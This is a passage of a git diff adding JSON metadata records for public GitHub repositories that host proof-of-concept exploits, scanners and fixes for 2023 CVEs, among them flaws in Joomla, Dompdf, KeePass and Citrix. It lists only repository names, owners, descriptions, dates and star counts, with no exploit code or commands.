"topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 770897039, + "name": "CVE-2023-23752", + "full_name": "JohnDoeAnonITA\/CVE-2023-23752", + "owner": { + "login": "JohnDoeAnonITA", + "id": 162304433, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/162304433?v=4", + "html_url": "https:\/\/github.com\/JohnDoeAnonITA", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/JohnDoeAnonITA\/CVE-2023-23752", + "description": "CVE-2023-23752 Data Extractor", + "fork": false, + "created_at": "2024-03-12T10:59:10Z", + "updated_at": "2024-05-03T08:40:27Z", + "pushed_at": "2024-05-03T09:05:18Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 785240418, + "name": "CVE-2023-23752", + "full_name": "0xWhoami35\/CVE-2023-23752", + "owner": { + "login": "0xWhoami35", + "id": 107396843, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/107396843?v=4", + "html_url": "https:\/\/github.com\/0xWhoami35", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xWhoami35\/CVE-2023-23752", + "description": null, + "fork": false, + "created_at": "2024-04-11T13:39:44Z", + "updated_at": "2024-04-14T08:33:21Z", + "pushed_at": "2024-04-11T14:46:16Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 787014993, + "name": "CVE-2023-23752-Python", + "full_name": "mariovata\/CVE-2023-23752-Python", + "owner": { + "login": "mariovata", + "id": 33606897, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33606897?v=4", + "html_url": "https:\/\/github.com\/mariovata", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mariovata\/CVE-2023-23752-Python", + "description": "Joomla! < 4.2.8 - Unauthenticated information disclosure", + "fork": false, + "created_at": "2024-04-15T18:18:02Z", + "updated_at": "2024-04-15T19:36:05Z", + "pushed_at": "2024-04-15T19:34:31Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 793175121, + "name": "CVE-2023-23752", + "full_name": "0xx01\/CVE-2023-23752", + "owner": { + "login": "0xx01", + "id": 130947610, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/130947610?v=4", + "html_url": "https:\/\/github.com\/0xx01", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xx01\/CVE-2023-23752", + "description": "A simple bash script to exploit Joomla! < 4.2.8 - Unauthenticated information disclosure", + "fork": false, + "created_at": "2024-04-28T16:32:21Z", + "updated_at": "2024-04-28T16:50:44Z", + "pushed_at": "2024-04-28T16:50:42Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 796038372, + "name": "CVE-2023-23752", + "full_name": "n3rdh4x0r\/CVE-2023-23752", + "owner": { + "login": "n3rdh4x0r", + "id": 66146701, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/66146701?v=4", + "html_url": "https:\/\/github.com\/n3rdh4x0r", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/n3rdh4x0r\/CVE-2023-23752", + "description": "Joomla! v4.2.8 - Unauthenticated information disclosure", + "fork": false, + "created_at": "2024-05-04T18:44:12Z", + "updated_at": "2024-05-31T14:11:29Z", + "pushed_at": "2024-05-31T14:11:26Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 796329590, + "name": "CVE-2023-23752-Joomla-v4.2.8", + "full_name": "mil4ne\/CVE-2023-23752-Joomla-v4.2.8", + "owner": { + "login": "mil4ne", + "id": 89859279, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/89859279?v=4", + "html_url": "https:\/\/github.com\/mil4ne", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mil4ne\/CVE-2023-23752-Joomla-v4.2.8", + "description": null, + "fork": false, + "created_at": "2024-05-05T16:16:03Z", + "updated_at": "2024-07-26T03:10:17Z", + "pushed_at": "2024-05-05T16:42:39Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 841070470, + "name": "CVE-2023-23752", + "full_name": "Aureum01\/CVE-2023-23752", + "owner": { + "login": "Aureum01", + "id": 71108402, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/71108402?v=4", + "html_url": "https:\/\/github.com\/Aureum01", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Aureum01\/CVE-2023-23752", + "description": "A bash automation that exploits the vulnerable endpoints for the Joomla! API 4.0 - 4.2.7", + "fork": false, + "created_at": "2024-08-11T14:55:50Z", + "updated_at": "2024-08-11T15:07:13Z", + "pushed_at": "2024-08-11T15:07:10Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-23924.json b/2023/CVE-2023-23924.json new file mode 100644 index 0000000000..a3278dac2e --- /dev/null +++ b/2023/CVE-2023-23924.json @@ -0,0 +1,33 @@ +[ + { + "id": 596224234, + "name": "CVE-2023-23924", + "full_name": "motikan2010\/CVE-2023-23924", + "owner": { + "login": "motikan2010", + "id": 3177297, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3177297?v=4", + "html_url": "https:\/\/github.com\/motikan2010", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/motikan2010\/CVE-2023-23924", + "description": "CVE-2023-23924 (Dompdf - RCE) PoC", + "fork": false, + "created_at": "2023-02-01T18:21:23Z", + "updated_at": "2024-06-26T12:04:49Z", + "pushed_at": "2023-02-02T02:05:12Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 9, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-23946.json b/2023/CVE-2023-23946.json new file mode 100644 index 0000000000..9de0a28122 --- /dev/null +++ b/2023/CVE-2023-23946.json @@ -0,0 +1,33 @@ +[ + { + "id": 688420580, + "name": "CVE-2023-23946-POC", + "full_name": "bruno-1337\/CVE-2023-23946-POC", + "owner": { + "login": "bruno-1337", + "id": 71904759, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/71904759?v=4", + "html_url": "https:\/\/github.com\/bruno-1337", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bruno-1337\/CVE-2023-23946-POC", + "description": "Explanation and POC of the CVE-2023-23946", + "fork": false, + "created_at": "2023-09-07T10:07:25Z", + "updated_at": "2023-09-07T10:07:26Z", + "pushed_at": "2023-09-13T02:57:51Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-24044.json b/2023/CVE-2023-24044.json new file mode 100644 index 0000000000..1463b0c64d --- /dev/null +++ b/2023/CVE-2023-24044.json @@ -0,0 +1,40 @@ +[ + { + "id": 806027931, + "name": "CVE-2023-24044", + "full_name": "Cappricio-Securities\/CVE-2023-24044", + "owner": { + "login": "Cappricio-Securities", + "id": 102907425, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102907425?v=4", + "html_url": "https:\/\/github.com\/Cappricio-Securities", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Cappricio-Securities\/CVE-2023-24044", + "description": "Plesk Obsidian <=18.0.49 - Open Redirect", + "fork": false, + "created_at": "2024-05-26T06:56:05Z", + "updated_at": "2024-09-18T15:02:55Z", + "pushed_at": "2024-06-24T09:03:56Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2023-24044", + "cve-2023-24044-scanner", + "openredirect", + "plesk-obsidian", + "plesk-obsidian-open-redirect", + "wapt" + ], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-24055.json b/2023/CVE-2023-24055.json new file mode 100644 index 0000000000..48a245e7f1 --- /dev/null +++ b/2023/CVE-2023-24055.json @@ -0,0 +1,229 @@ +[ + { + "id": 592899217, + "name": "CVE-2023-24055", + "full_name": "deetl\/CVE-2023-24055", + "owner": { + "login": "deetl", + "id": 50047716, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50047716?v=4", + "html_url": "https:\/\/github.com\/deetl", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/deetl\/CVE-2023-24055", + "description": "POC and Scanner for CVE-2023-24055", + "fork": false, + "created_at": "2023-01-24T19:19:23Z", + "updated_at": "2024-08-12T20:29:28Z", + "pushed_at": "2023-01-25T00:04:57Z", + "stargazers_count": 63, + "watchers_count": 63, + "has_discussions": false, + "forks_count": 17, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 17, + "watchers": 63, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 593024753, + "name": "CVE-2023-24055_PoC", + "full_name": "alt3kx\/CVE-2023-24055_PoC", + "owner": { + "login": "alt3kx", + "id": 3140111, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3140111?v=4", + "html_url": "https:\/\/github.com\/alt3kx", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/alt3kx\/CVE-2023-24055_PoC", + "description": "CVE-2023-24055 PoC (KeePass 2.5x)", + "fork": false, + "created_at": "2023-01-25T03:21:42Z", + "updated_at": "2024-09-14T08:53:21Z", + "pushed_at": "2023-02-10T08:03:59Z", + "stargazers_count": 254, + "watchers_count": 254, + "has_discussions": false, + "forks_count": 38, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 38, + "watchers": 254, + "score": 0, + "subscribers_count": 7 + }, + { + "id": 594744538, + "name": "keepass_CVE-2023-24055_yara_rule", + "full_name": "Cyb3rtus\/keepass_CVE-2023-24055_yara_rule", + "owner": { + "login": "Cyb3rtus", + "id": 68970119, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/68970119?v=4", + "html_url": "https:\/\/github.com\/Cyb3rtus", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Cyb3rtus\/keepass_CVE-2023-24055_yara_rule", + "description": "Contains a simple yara rule to hunt for possible compromised KeePass config files", + "fork": false, + "created_at": "2023-01-29T14:13:44Z", + "updated_at": "2023-07-20T11:05:47Z", + "pushed_at": "2023-03-07T21:32:56Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "scanner", + "security", + "security-tools" + ], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 595134794, + "name": "CVE-2023-24055", + "full_name": "duckbillsecurity\/CVE-2023-24055", + "owner": { + "login": "duckbillsecurity", + "id": 58594630, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/58594630?v=4", + "html_url": "https:\/\/github.com\/duckbillsecurity", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/duckbillsecurity\/CVE-2023-24055", + "description": "CVE-2023-24055 POC written in PowerShell.", + "fork": false, + "created_at": "2023-01-30T13:22:22Z", + "updated_at": "2024-08-12T20:29:34Z", + "pushed_at": "2023-02-04T19:44:43Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2023-24055", + "cve-2023-24055-poc", + "keepass", + "poc", + "proof-of-concept" + ], + "visibility": "public", + "forks": 2, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 595342543, + "name": "PoC_CVE-2023-24055", + "full_name": "julesbozouklian\/PoC_CVE-2023-24055", + "owner": { + "login": "julesbozouklian", + "id": 26013529, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26013529?v=4", + "html_url": "https:\/\/github.com\/julesbozouklian", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/julesbozouklian\/PoC_CVE-2023-24055", + "description": null, + "fork": false, + "created_at": "2023-01-30T22:10:57Z", + "updated_at": "2023-02-15T09:27:08Z", + "pushed_at": "2023-01-31T14:36:31Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 599394994, + "name": "KeePass-TriggerLess", + "full_name": "digital-dev\/KeePass-TriggerLess", + "owner": { + "login": "digital-dev", + "id": 18492599, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18492599?v=4", + "html_url": "https:\/\/github.com\/digital-dev", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/digital-dev\/KeePass-TriggerLess", + "description": "KeePass 2.53.1 with removed ECAS Trigger System Remediating CVE-2023-24055", + "fork": false, + "created_at": "2023-02-09T03:22:25Z", + "updated_at": "2023-02-09T03:23:48Z", + "pushed_at": "2023-02-09T21:49:56Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 601458156, + "name": "KeePass-CVE-2023-24055", + "full_name": "zwlsix\/KeePass-CVE-2023-24055", + "owner": { + "login": "zwlsix", + "id": 88372814, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88372814?v=4", + "html_url": "https:\/\/github.com\/zwlsix", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/zwlsix\/KeePass-CVE-2023-24055", + "description": "KeePass CVE-2023-24055复现", + "fork": false, + "created_at": "2023-02-14T05:20:58Z", + "updated_at": "2023-02-14T06:10:59Z", + "pushed_at": "2023-02-14T06:07:45Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-24059.json b/2023/CVE-2023-24059.json new file mode 100644 index 0000000000..4d430392c9 --- /dev/null +++ b/2023/CVE-2023-24059.json @@ -0,0 +1,33 @@ +[ + { + "id": 592223844, + "name": "CVE-2023-24059", + "full_name": "gmh5225\/CVE-2023-24059", + "owner": { + "login": "gmh5225", + "id": 13917777, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13917777?v=4", + "html_url": "https:\/\/github.com\/gmh5225", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/gmh5225\/CVE-2023-24059", + "description": "Grand Theft Auto V for PC allows attackers to achieve partial remote code execution or modify files on a PC, as exploited in the wild in January 2023. CVE project by @Sn0wAlice", + "fork": false, + "created_at": "2023-01-23T08:48:08Z", + "updated_at": "2023-02-20T16:16:21Z", + "pushed_at": "2023-01-22T11:39:03Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-24078.json b/2023/CVE-2023-24078.json new file mode 100644 index 0000000000..3ea9d6763a --- /dev/null +++ b/2023/CVE-2023-24078.json @@ -0,0 +1,95 @@ +[ + { + "id": 654818931, + "name": "CVE-2023-24078", + "full_name": "overgrowncarrot1\/CVE-2023-24078", + "owner": { + "login": "overgrowncarrot1", + "id": 78485709, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78485709?v=4", + "html_url": "https:\/\/github.com\/overgrowncarrot1", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/overgrowncarrot1\/CVE-2023-24078", + "description": "CVE-2023-24078 for FuguHub \/ BarracudaDrive", + "fork": false, + "created_at": "2023-06-17T03:39:35Z", + "updated_at": "2024-07-25T09:36:55Z", + "pushed_at": "2023-06-19T01:21:42Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 7, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 654914326, + "name": "CVE-2023-24078", + "full_name": "rio128128\/CVE-2023-24078", + "owner": { + "login": "rio128128", + "id": 136775778, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/136775778?v=4", + "html_url": "https:\/\/github.com\/rio128128", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/rio128128\/CVE-2023-24078", + "description": "CVE-2023-24078 for FuguHub \/ BarracudaDrive", + "fork": false, + "created_at": "2023-06-17T10:11:24Z", + "updated_at": "2023-06-20T09:13:22Z", + "pushed_at": "2023-06-17T10:11:43Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 728491152, + "name": "CVE-2023-24078", + "full_name": "ag-rodriguez\/CVE-2023-24078", + "owner": { + "login": "ag-rodriguez", + "id": 55252902, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/55252902?v=4", + "html_url": "https:\/\/github.com\/ag-rodriguez", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ag-rodriguez\/CVE-2023-24078", + "description": null, + "fork": false, + "created_at": "2023-12-07T03:45:27Z", + "updated_at": "2024-07-02T02:45:03Z", + "pushed_at": "2024-07-02T02:45:00Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-24100.json b/2023/CVE-2023-24100.json new file mode 100644 index 0000000000..08aa6e365f --- /dev/null +++ b/2023/CVE-2023-24100.json @@ -0,0 +1,33 @@ +[ + { + "id": 727552823, + "name": "CVE-2023-24100", + "full_name": "badboycxcc\/CVE-2023-24100", + "owner": { + "login": "badboycxcc", + "id": 72059221, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/72059221?v=4", + "html_url": "https:\/\/github.com\/badboycxcc", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/badboycxcc\/CVE-2023-24100", + "description": "nuclei templates CVE RCE CNVD IoT", + "fork": false, + "created_at": "2023-12-05T05:00:27Z", + "updated_at": "2023-12-30T06:44:58Z", + "pushed_at": "2023-12-06T13:48:06Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-24203.json b/2023/CVE-2023-24203.json new file mode 100644 index 0000000000..8e0f9ae7a1 --- /dev/null +++ b/2023/CVE-2023-24203.json @@ -0,0 +1,33 @@ +[ + { + "id": 800288554, + "name": "CVE-2023-24203-and-CVE-2023-24204", + "full_name": "momo1239\/CVE-2023-24203-and-CVE-2023-24204", + "owner": { + "login": "momo1239", + "id": 34490185, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/34490185?v=4", + "html_url": "https:\/\/github.com\/momo1239", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/momo1239\/CVE-2023-24203-and-CVE-2023-24204", + "description": null, + "fork": false, + "created_at": "2024-05-14T03:53:03Z", + "updated_at": "2024-05-14T04:13:00Z", + "pushed_at": "2024-05-14T04:12:57Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-24249.json b/2023/CVE-2023-24249.json new file mode 100644 index 0000000000..2702a5cf15 --- /dev/null +++ b/2023/CVE-2023-24249.json @@ -0,0 +1,33 @@ +[ + { + "id": 839153746, + "name": "CVE-2023-24249-Exploit", + "full_name": "IDUZZEL\/CVE-2023-24249-Exploit", + "owner": { + "login": "IDUZZEL", + "id": 63135823, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/63135823?v=4", + "html_url": "https:\/\/github.com\/IDUZZEL", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/IDUZZEL\/CVE-2023-24249-Exploit", + "description": "Exploit script for CVE-2023-24249 - a vulnerability allowing remote code execution via file upload and command injection.", + "fork": false, + "created_at": "2024-08-07T04:36:44Z", + "updated_at": "2024-11-20T16:31:00Z", + "pushed_at": "2024-08-07T04:41:25Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-24317.json b/2023/CVE-2023-24317.json new file mode 100644 index 0000000000..2ecb0c215a --- /dev/null +++ b/2023/CVE-2023-24317.json @@ -0,0 +1,33 @@ +[ + { + "id": 611463904, + "name": "CVE-2023-24317", + "full_name": "angelopioamirante\/CVE-2023-24317", + "owner": { + "login": "angelopioamirante", + "id": 38589929, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38589929?v=4", + "html_url": "https:\/\/github.com\/angelopioamirante", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/angelopioamirante\/CVE-2023-24317", + "description": "Judging Management System v1.0 - Unrestricted File Upload + RCE (Unauthenticated)", + "fork": false, + "created_at": "2023-03-08T22:00:44Z", + "updated_at": "2024-01-23T13:36:47Z", + "pushed_at": "2024-01-22T10:17:43Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-24329.json b/2023/CVE-2023-24329.json new file mode 100644 index 0000000000..fc1109f8f0 --- /dev/null +++ b/2023/CVE-2023-24329.json @@ -0,0 +1,95 @@ +[ + { + "id": 679660290, + "name": "CVE-2023-24329-PoC", + "full_name": "H4R335HR\/CVE-2023-24329-PoC", + "owner": { + "login": "H4R335HR", + "id": 121650077, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/121650077?v=4", + "html_url": "https:\/\/github.com\/H4R335HR", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/H4R335HR\/CVE-2023-24329-PoC", + "description": null, + "fork": false, + "created_at": "2023-08-17T10:33:52Z", + "updated_at": "2023-08-17T10:37:28Z", + "pushed_at": "2023-08-17T10:41:06Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 680228161, + "name": "CVE-2023-24329-codeql-test", + "full_name": "Pandante-Central\/CVE-2023-24329-codeql-test", + "owner": { + "login": "Pandante-Central", + "id": 128833419, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/128833419?v=4", + "html_url": "https:\/\/github.com\/Pandante-Central", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Pandante-Central\/CVE-2023-24329-codeql-test", + "description": null, + "fork": false, + "created_at": "2023-08-18T16:53:11Z", + "updated_at": "2023-08-18T16:55:17Z", + "pushed_at": "2023-08-18T17:34:22Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 795324648, + "name": "CVE-2023-24329-Exploit", + "full_name": "PenTestMano\/CVE-2023-24329-Exploit", + "owner": { + "login": "PenTestMano", + "id": 162714784, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/162714784?v=4", + "html_url": "https:\/\/github.com\/PenTestMano", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/PenTestMano\/CVE-2023-24329-Exploit", + "description": "Example of CVE-2023-24329 ", + "fork": false, + "created_at": "2024-05-03T03:16:02Z", + "updated_at": "2024-05-03T03:16:02Z", + "pushed_at": "2023-10-13T07:42:36Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-2437.json b/2023/CVE-2023-2437.json new file mode 100644 index 0000000000..3ac9567e3b --- /dev/null +++ b/2023/CVE-2023-2437.json @@ -0,0 +1,33 @@ +[ + { + "id": 766289815, + "name": "CVE-2023-2437", + "full_name": "RxRCoder\/CVE-2023-2437", + "owner": { + "login": "RxRCoder", + "id": 161977912, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/161977912?v=4", + "html_url": "https:\/\/github.com\/RxRCoder", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RxRCoder\/CVE-2023-2437", + "description": null, + "fork": false, + "created_at": "2024-03-02T21:09:07Z", + "updated_at": "2024-03-02T21:18:30Z", + "pushed_at": "2024-03-02T21:19:44Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-24488.json b/2023/CVE-2023-24488.json new file mode 100644 index 0000000000..43074865df --- /dev/null +++ b/2023/CVE-2023-24488.json @@ -0,0 +1,128 @@ +[ + { + "id": 661072883, + "name": "CVE-2023-24488-PoC", + "full_name": "SirBugs\/CVE-2023-24488-PoC", + "owner": { + "login": "SirBugs", + "id": 37689994, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/37689994?v=4", + "html_url": "https:\/\/github.com\/SirBugs", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/SirBugs\/CVE-2023-24488-PoC", + "description": "CVE-2023-24488 PoC", + "fork": false, + "created_at": "2023-07-01T17:47:17Z", + "updated_at": "2024-11-16T19:54:52Z", + "pushed_at": "2023-07-01T17:49:16Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 9, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 662260047, + "name": "CVE-2023-24488", + "full_name": "securitycipher\/CVE-2023-24488", + "owner": { + "login": "securitycipher", + "id": 111536600, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/111536600?v=4", + "html_url": "https:\/\/github.com\/securitycipher", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/securitycipher\/CVE-2023-24488", + "description": "POC for CVE-2023-24488", + "fork": false, + "created_at": "2023-07-04T18:02:50Z", + "updated_at": "2024-11-14T08:33:30Z", + "pushed_at": "2023-07-04T18:39:03Z", + "stargazers_count": 13, + 